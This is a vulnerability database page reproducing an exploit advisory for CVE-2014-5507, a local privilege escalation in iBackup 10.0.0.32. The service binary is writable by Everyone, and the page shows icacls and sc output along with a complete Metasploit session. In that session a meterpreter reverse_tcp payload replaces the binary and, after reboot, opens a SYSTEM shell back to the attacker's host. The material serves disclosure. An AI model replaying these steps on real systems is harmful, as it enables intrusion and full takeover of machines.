Vulners
Lucene search
iBackup 10.0.0.32 - Local Privilege Escalation
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | iBackup 10.0.0.32 - Local Privilege Escalation Vulnerability | 22 Oct 201400:00 | – | zdt |
 | CVE-2014-5507 | 3 Nov 201416:00 | – | cve |
 | CVE-2014-5507 | 3 Nov 201416:00 | – | cvelist |
 | iBackup 10.0.0.32 - Local Privilege Escalation | 22 Oct 201400:00 | – | exploitdb |
 | EUVD-2014-5394 | 7 Oct 202500:30 | – | euvd |
 | iBackup 10.0.0.32 - Local Privilege Escalation | 22 Oct 201400:00 | – | exploitpack |
 | CVE-2014-5507 | 3 Nov 201416:55 | – | nvd |
 | iBackup Local Privilege Escalation Vulnerability - Windows | 1 Dec 201400:00 | – | openvas |
 | Design/Logic Flaw | 3 Nov 201416:55 | – | prion |
# Exploit Title: iBackup <= 10.0.0.32 Local Privilege Escalation
# Date: 23/01/2014
# Author: Glafkos Charalambous <glafkos.charalambous[at]unithreat.com>
# Version: 10.0.0.32
# Vendor: IBackup
# Vendor URL: https://www.ibackup.com/
# CVE-2014-5507
Vulnerability Details
There are weak permissions for IBackupWindows default installation where everyone is allowed to change
the ib_service.exe with an executable of their choice. When the service restarts or the system reboots
the attacker payload will execute on the system with SYSTEM privileges.
C:\Users\0x414141>icacls "C:\Program Files\IBackupWindows\ib_service.exe"
C:\Program Files\IBackupWindows\ib_service.exe Everyone:(I)(F)
NT AUTHORITY\SYSTEM:(I)(F)
BUILTIN\Administrators:(I)(F)
BUILTIN\Users:(I)(RX)
Successfully processed 1 files; Failed processing 0 files
C:\Users\0x414141>sc qc IBService
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: IBService
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : "C:\Program Files\IBackupWindows\ib_service.exe"
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : IBackup Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
msf exploit(service_permissions) > sessions
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
msf exploit(service_permissions) > show options
Module options (exploit/windows/local/service_permissions):
Name Current Setting Required Description
---- --------------- -------- -----------
AGGRESSIVE true no Exploit as many services as possible (dangerous)
SESSION 1 yes The session to run this module on.
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (accepted: seh, thread, process, none)
LHOST 192.168.0.100 yes The listen address
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(service_permissions) > exploit
[*] Started reverse handler on 192.168.0.100:4444
[*] Meterpreter stager executable 15872 bytes long being uploaded..
[*] Trying to add a new service...
[*] No privs to create a service...
[*] Trying to find weak permissions in existing services..
[*] IBService has weak file permissions - C:\Program Files\IBackupWindows\ib_service.exe moved to C:\Program Files\IBackupWindows\ib_service.exe.bak and replaced.
[*] Restarting IBService
[*] Could not restart IBService. Wait for a reboot. (or force one yourself)
Upon Reboot or Service Restart
[*] Sending stage (770048 bytes) to 192.168.0.102
[*] Meterpreter session 2 opened (192.168.0.100:4444 -> 192.168.0.102:14852) at 2014-07-21 00:52:36 +0300
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > background
[*] Backgrounding session 2...
msf exploit(service_permissions) > sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 0x414141-PC\0x414141 @ 0x414141-PC 192.168.0.100:8443 -> 192.168.0.102:1158 (192.168.0.102)
2 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ 0x414141-PC 192.168.0.100:4444 -> 192.168.0.102:14852 (192.168.0.102)
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
13 Nov 2014 00:00Current
6.5Medium risk
Vulners AI Score6.5
EPSS0.01131